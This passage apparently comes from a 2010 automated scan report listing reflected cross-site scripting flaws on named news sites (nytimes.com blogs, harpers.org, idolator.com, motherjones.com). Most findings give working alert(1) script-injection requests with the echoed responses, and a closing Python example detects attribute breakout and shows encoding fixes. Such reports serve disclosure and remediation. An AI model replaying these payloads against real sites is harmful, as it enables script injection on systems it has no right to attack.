The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2ec"><script>alert(1)</script>8d7a351f0ef was submitted in the src parameter. This input was echoed as af2ec\"><script>alert(1)</script>8d7a351f0ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/10/biking-los-angeles/?src=mvaf2ec"><script>alert(1)</script>8d7a351f0ef&ref=travel HTTP/1.1
Host: frugaltraveler.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://frugaltraveler.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
eft9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Budget+Travel;Discount+Travel;Cheap+Travel;Travel;Travel+Tips;Travel+Advice;biking;los-angeles&src=mvaf2ec\"><script>alert(1)</script>8d7a351f0ef">
...[SNIP]...

3.132. http://gadgetwise.blogs.nytimes.com/2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gadgetwise.blogs.nytimes.com
Path:   /2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0dd9"><script>alert(1)</script>ffceabef99c was submitted in the src parameter. This input was echoed as f0dd9\"><script>alert(1)</script>ffceabef99c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/?src=twrf0dd9"><script>alert(1)</script>ffceabef99c HTTP/1.1
Host: gadgetwise.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:02:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://gadgetwise.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 63517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
w3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Electronics;Gadgets;Personal+Tech;New+Technology;New+Technology+Products;allrecipes;epicurious;ipad;ipad;mobile-tech&src=twrf0dd9\"><script>alert(1)</script>ffceabef99c">
...[SNIP]...

3.133. http://harpers.org/subjects/Sentences [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://harpers.org
Path:   /subjects/Sentences

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4564a"><img%20src%3da%20onerror%3dalert(1)>34f47c9c810 was submitted in the REST URL parameter 2. This input was echoed as 4564a"><img src=a onerror=alert(1)>34f47c9c810 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /subjects/Sentences4564a"><img%20src%3da%20onerror%3dalert(1)>34f47c9c810 HTTP/1.1
Host: harpers.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 01:29:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Cache-Control: max-age=14400
Expires: Sat, 13 Nov 2010 05:29:36 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 6802
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
<input type="hidden" name="source" value="/subjects/Sentences4564a"><img src=a onerror=alert(1)>34f47c9c810" />
...[SNIP]...

3.134. http://idolator.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4566"><script>alert(1)</script>90fff6bafdf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4566\"><script>alert(1)</script>90fff6bafdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f4566"><script>alert(1)</script>90fff6bafdf=1 HTTP/1.1
Host: idolator.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:04:54 GMT
Server: Apache
Set-Cookie: GEOIP_COUNTRY_CODE=US; path=/; domain=idolator.com
X-Powered-By: PHP/5.3.3
Vary: Cookie
X-Pingback: http://idolator.com/xmlrpc.php
Set-Cookie: PHPSESSID=0fea5498bc1e06749b73cf9da169255d; path=/
Last-Modified: Fri, 12 Nov 2010 18:04:55 -0800
Cache-Control: max-age=300, must-revalidate
Keep-Alive: timeout=5, max=1
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 88149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/?f4566\"><script>alert(1)</script>90fff6bafdf=1" />
...[SNIP]...

3.135. http://intransit.blogs.nytimes.com/2010/09/15/show-us-your-city/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intransit.blogs.nytimes.com
Path:   /2010/09/15/show-us-your-city/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c00"><script>alert(1)</script>03798aac80c was submitted in the src parameter. This input was echoed as d9c00\"><script>alert(1)</script>03798aac80c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/09/15/show-us-your-city/?src=mvd9c00"><script>alert(1)</script>03798aac80c&ref=travel HTTP/1.1
Host: intransit.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:05:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 59592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ft7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;show-us-your-city;video&src=mvd9c00\"><script>alert(1)</script>03798aac80c">
...[SNIP]...

3.136. http://intransit.blogs.nytimes.com/2010/11/11/prague-art-show-embraces-decadence/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intransit.blogs.nytimes.com
Path:   /2010/11/11/prague-art-show-embraces-decadence/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b807"><script>alert(1)</script>1aa3eacb6c4 was submitted in the src parameter. This input was echoed as 7b807\"><script>alert(1)</script>1aa3eacb6c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/11/prague-art-show-embraces-decadence/?src=mv7b807"><script>alert(1)</script>1aa3eacb6c4&ref=travel HTTP/1.1
Host: intransit.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:05:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 58574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;art;globespotters;prague;prague&src=mv7b807\"><script>alert(1)</script>1aa3eacb6c4">
...[SNIP]...

3.137. http://intransit.blogs.nytimes.com/2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intransit.blogs.nytimes.com
Path:   /2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93df7"><script>alert(1)</script>78bd648be4f was submitted in the src parameter. This input was echoed as 93df7\"><script>alert(1)</script>78bd648be4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/?src=me93df7"><script>alert(1)</script>78bd648be4f&ref=travel HTTP/1.1
Host: intransit.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:05:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 56967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;q-a;siem-reap&src=me93df7\"><script>alert(1)</script>78bd648be4f">
...[SNIP]...

3.138. http://intransit.blogs.nytimes.com/2010/11/12/japans-high-speed-trains-lines-expand/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intransit.blogs.nytimes.com
Path:   /2010/11/12/japans-high-speed-trains-lines-expand/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff1af"><script>alert(1)</script>c890c53b0a0 was submitted in the src parameter. This input was echoed as ff1af\"><script>alert(1)</script>c890c53b0a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/japans-high-speed-trains-lines-expand/?src=mvff1af"><script>alert(1)</script>c890c53b0a0&ref=travel HTTP/1.1
Host: intransit.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:05:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 52981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ft3,Left4,Left5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.&src=mvff1af\"><script>alert(1)</script>c890c53b0a0">
...[SNIP]...

3.139. http://intransit.blogs.nytimes.com/2010/11/12/paris-photo-fair-covers-the-spectrum/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intransit.blogs.nytimes.com
Path:   /2010/11/12/paris-photo-fair-covers-the-spectrum/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8307"><script>alert(1)</script>b0e62f7972a was submitted in the src parameter. This input was echoed as f8307\"><script>alert(1)</script>b0e62f7972a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/paris-photo-fair-covers-the-spectrum/?src=mef8307"><script>alert(1)</script>b0e62f7972a&ref=travel HTTP/1.1
Host: intransit.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:05:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 56822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
MNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;festivals;globespotters;paris;paris;photography&src=mef8307\"><script>alert(1)</script>b0e62f7972a">
...[SNIP]...

3.140. http://intransit.blogs.nytimes.com/2010/11/12/sunday-preview-66/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intransit.blogs.nytimes.com
Path:   /2010/11/12/sunday-preview-66/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db75"><script>alert(1)</script>d8711375637 was submitted in the src parameter. This input was echoed as 6db75\"><script>alert(1)</script>d8711375637 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/sunday-preview-66/?src=twr6db75"><script>alert(1)</script>d8711375637 HTTP/1.1
Host: intransit.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:04:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 52105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
t3,Left4,Left5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.&src=twr6db75\"><script>alert(1)</script>d8711375637">
...[SNIP]...

3.141. http://lens.blogs.nytimes.com/2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lens.blogs.nytimes.com
Path:   /2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80454"><script>alert(1)</script>433d57f0df7 was submitted in the src parameter. This input was echoed as 80454\"><script>alert(1)</script>433d57f0df7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/?src=twr80454"><script>alert(1)</script>433d57f0df7 HTTP/1.1
Host: lens.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:05:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://lens.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ali;armando-franca;athar-hussain;carlos-barria;christoph-bangert;doug-mills;emilio-morenatti;hassan-ammar;john-woods;marcia-allert;merrill-d-oliver;pictures-of-the-day;rafiq-maqbool;saurabh-das&src=twr80454\"><script>alert(1)</script>433d57f0df7">
...[SNIP]...

3.142. http://mediadecoder.blogs.nytimes.com/2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mediadecoder.blogs.nytimes.com
Path:   /2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e403"><script>alert(1)</script>d4b8c05b2e1 was submitted in the src parameter. This input was echoed as 9e403\"><script>alert(1)</script>d4b8c05b2e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/?src=twr9e403"><script>alert(1)</script>d4b8c05b2e1 HTTP/1.1
Host: mediadecoder.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:06:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://mediadecoder.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
E&query=qstring&keywords=New+York+Times;television;guide+to+television;TV+Decoder;Carpetbagger;guide+to+media;newspapers;magazines;media;movies;marketing;new+media.+;mel-gibson;movies;new-media&src=twr9e403\"><script>alert(1)</script>d4b8c05b2e1">
...[SNIP]...

3.143. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://motherjones.com
Path:   /kevin-drum/2010/11/deficit-commission-serious

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ada2"><script>alert(1)</script>177d0296e29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /kevin-drum/20101ada2"><script>alert(1)</script>177d0296e29/11/deficit-commission-serious HTTP/1.1
Host: motherjones.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Cache-Control: public, max-age=900
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1289613974"
Last-Modified: Sat, 13 Nov 2010 02:06:14 GMT
Content-Length: 80914
Date: Sat, 13 Nov 2010 02:06:15 GMT
X-Varnish: 699349395
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="/user/login?destination=kevin-drum/20101ada2"><script>alert(1)</script>177d0296e29/11/deficit-commission-serious" title="Login">
...[SNIP]...

3.144. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://motherjones.com
Path:   /kevin-drum/2010/11/deficit-commission-serious

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32510"><script>alert(1)</script>e15e07f5a9a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /kevin-drum/2010/1132510"><script>alert(1)</script>e15e07f5a9a/deficit-commission-serious HTTP/1.1
Host: motherjones.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Cache-Control: public, max-age=900
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1289613988"
Last-Modified: Sat, 13 Nov 2010 02:06:28 GMT
Content-Length: 80832
Date: Sat, 13 Nov 2010 02:06:29 GMT
X-Varnish: 699351119
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="/user/login?destination=kevin-drum/2010/1132510"><script>alert(1)</script>e15e07f5a9a/deficit-commission-serious" title="Login">
...[SNIP]...

3.145. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://motherjones.com
Path:   /kevin-drum/2010/11/deficit-commission-serious

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70bd9"><script>alert(1)</script>957dc10fdf0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /kevin-drum/2010/11/deficit-commission-serious70bd9"><script>alert(1)</script>957dc10fdf0 HTTP/1.1
Host: motherjones.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Cache-Control: public, max-age=900
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1289613992"
Last-Modified: Sat, 13 Nov 2010 02:06:32 GMT
Content-Length: 209766
Date: Sat, 13 Nov 2010 02:06:33 GMT
X-Varnish: 699351724
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="/user/login?destination=kevin-drum/2010/11/deficit-commission-serious70bd9"><script>alert(1)</script>957dc10fdf0" title="Login">
...[SNIP]...

3.146. http://movies.nytimes.com/2010/11/10/movies/10morning.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/10/movies/10morning.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db374"><script>alert(1)</script>0629960ed8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The sink is the "print version" link: the page rebuilds its own URL from the raw query string and appends &pagewanted=print, so every parameter name and value in the query is reflected into the href attribute. The remaining movies.nytimes.com findings in this section, whatever parameter they name, share that single sink.

Request

GET /2010/11/10/movies/10morning.html?db374"><script>alert(1)</script>0629960ed8c=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:06 GMT
Content-type: text/html
Content-Length: 73577



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/10/movies/10morning.html?db374"><script>alert(1)</script>0629960ed8c=1&pagewanted=print">
...[SNIP]...
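
The three sinks seen so far (the backslash-escaped src value at the top of this section, the path segments echoed into motherjones.com's login link, and the raw query string echoed into movies.nytimes.com's print link) are one bug class: input lands inside a double-quoted attribute without attribute encoding. The Python script below is an added example, not code from the report or from either site. The link builders are constructed stand-ins for the real templates and the ARTICLE URL is a placeholder. It uses the standard-library HTML parser as a browser stand-in to check whether a reflected payload actually breaks out of the attribute, and shows that backslash-escaping leaves the quote active while percent-encoding URL components and then attribute-encoding the href does not.

```python
"""Attribute-context reflected XSS: checking whether a reflection breaks the
attribute, and building reflected links safely.

Added example; not code from the scan report or from the sites it covers.
The link builders are constructed stand-ins for the real templates and
ARTICLE is a placeholder sink URL."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qsl, quote, urlencode

# Payload in the report's format: prefix + "><script>alert(1)</script> + suffix.
PAYLOAD = '9e403"><script>alert(1)</script>d4b8c05b2e1'
ARTICLE = "http://movies.nytimes.com/2010/11/10/movies/10morning.html"  # placeholder


class TagCollector(HTMLParser):
    """Stand-in for the browser's tokenizer: records every start tag it emits."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def attribute_context_broken(fragment: str) -> bool:
    """True when a <script> start tag is tokenized out of the fragment, i.e. the
    reflected input terminated the attribute it was placed in."""
    parser = TagCollector()
    parser.feed(fragment)
    parser.close()
    return "script" in parser.tags


def backslash_escaped(value: str) -> str:
    """addslashes()/magic_quotes-style escaping. A backslash has no meaning inside
    an HTML attribute value, so the quote it precedes still ends the attribute."""
    return value.replace("\\", "\\\\").replace('"', '\\"').replace("'", "\\'")


def attribute_encoded(value: str) -> str:
    """Encode for a double-quoted HTML attribute: & < > " ' become entities."""
    return escape(value, quote=True)


# Sink 1 (the backslash-escaped src case): value escaped with backslashes, then
# concatenated into the attribute. Still exploitable.
def link_with_backslash_escaping(raw_query: str) -> str:
    return '<a href="%s?%s&pagewanted=print">' % (ARTICLE, backslash_escaped(raw_query))


# Sink 2 (movies.nytimes.com pattern): the raw query string, names and values
# alike, is concatenated into the "print" link.
def print_link_vulnerable(raw_query: str) -> str:
    return '<a href="%s?%s&pagewanted=print">' % (ARTICLE, raw_query)


def print_link_hardened(raw_query: str) -> str:
    """Parse the query, re-serialise it so every name and value is
    percent-encoded, then attribute-encode the whole URL (after urlencode only
    the '&' separators still change, but the outer layer belongs to the sink)."""
    params = parse_qsl(raw_query, keep_blank_values=True)
    params.append(("pagewanted", "print"))
    return '<a href="%s?%s">' % (ARTICLE, attribute_encoded(urlencode(params)))


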